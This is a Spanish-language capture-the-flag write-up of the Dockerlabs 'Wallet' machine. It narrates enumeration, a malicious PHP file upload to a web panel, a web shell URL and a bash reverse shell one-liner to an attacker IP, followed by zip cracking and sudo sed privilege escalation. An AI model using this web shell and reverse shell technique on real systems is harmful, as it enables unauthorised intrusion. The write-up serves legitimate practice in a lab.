Wallet
Que tal lord & lady
Esta maquina de hoy es, tal ves la maquina que todo mundo pudiera comenzar en el mundo del hacking o el pentesting, la maquina Wallet de la plataforma Dockerlabs.es.
Requisitos previos:
- Tener configurado al menos una virtual como Kali o Parrot (link aquí)
- Tener descargado lo necesario para el laboratorio de dockerlabs.es (link aquí)
Write Up Maquina Wallet #dockerlabs.es
Reconocimiento
Por el TTL=64 sabemos que se trata de una maquina Linux.
Por buena practica acostumbre realizar un echo "Linux" > Linux y lo mismo para la IP, esto con el objetivo de, cuando salga a descansar, un café, a distraerme, etc, volver y con un simple "ls" poder visualizar que es lo que llevo de la maquina, pero esto ya es estilo de organización de cada quien.
Enumeración
Quick scan:
Servicios y versiones:
Puerto 80
Whatweb:
Sitio web:
Wappalizer:
Nmap vuln
Por pura curiosidad antes de indagar e internet quiero ver que puede encontrar nmap con sus scripts "vuln":
Pareciera que encontró la posibilidad de un sqli...
Revisando parece ser que nop, no hace nada esta bendita URL
Encontró 3 directorios, css, images y js...
Revisando no encontramos nada, ni modo es bueno revisar todos los recursos.
Fuzzing
Directorios:
Tal parece que no hay mucho que hacer por aquí.
Código fuente
Aquí si que he encontrado algo:
Tal vez, necesitamos ver si hay virtual hosting y entrar a "http://panel.wallet.dl":
Verificamos la url:
Ulala!
Encontramos algo...
Voy a intentar lo siguiente, me registrare con la siguiente info:
username: test
email: test@test.com
password: test1234
Currency: Euro
Language: English
Damos en register
Intentamos iniciar sesión...
Estamos dentro del sitio, vamos a indagar ...
Explotación
Bien, pues después de jugar un buen rato, al fin pude subir un archivo desde el botón de "New Subscription".
Utilizando Burpsuite, pude ejecutar el siguiente request:
Si investigamos en la pagina como es que muestra las imágenes, podemos ver cual es la ubicación de las imágenes:
Vamos al directorio:
Tenemos nuestro archivo malicioso en php!
Accedemos a:
http://panel.wallet.dl/images/uploads/logos/1722910142-subscription-2.php?cmd=whoami
Vamos a entablarnos una reverseShell:
Maquina atacante: nos ponemos a la escucha...
Maquina victima:
Accedemos a:
http://panel.wallet.dl/images/uploads/logos/1722910142-subscription-2.php?cmd=bash -c 'bash -i >%26 /dev/tcp/172.17.0.1/443 0>%261'
Damos enter....
Maquina atacante:
Estamos dentro!
Post-Explotación
Full tty
Escalación de privilegios
Tenemos 2 usuarios aparte de root:
- pylon
- pinguino
sudo -l
Pudimos cambiar de usuario www-data a pylon
Tenemos un archivo zip
Nos pide contraseña, la cual no tenemos.
Tenemos que obtener este archivo y pasarlo a nuestra maquina atacante para poder realizar algún tipo de fuerza bruta.
Maquina victima:
Maquina acatante:
Papi!
Hemos conseguido la contraseña del archivo zip.
Hemos conseguido las credenciales del usuario pinguino
Ahora, a nivel de sudo podemos ejecutar el binario sed
Según gtfobins podemos intentar ejecutar las siguientes opciones con el fin de escalar privilegios:
Ejecutamos:
Ya somos root!
Conclusiones
Una maquina bastante chula donde hemos obtenido acceso a la maquina desde el sitio http://panel.wallet.dl, aquí nos registramos para entrar.
Posteriormente, realizamos una subida de archivo malicioso en php para poder ejecutar comandos desde el navegador.
Una vez dentro pivotamos entre los usuarios www-data a pylon, aquí crackeamos por fuerza bruta un archivo .zip que contenía la clave del usuario pinguino.
De este ultimo obtuvimos la escalada de privilegios por el binario sed, el cual el propietario es root.
Espero que este WriteUp te haya gustado.
Nos leemos en la próxima resolución de maquina :)
Comentarios
Publicar un comentario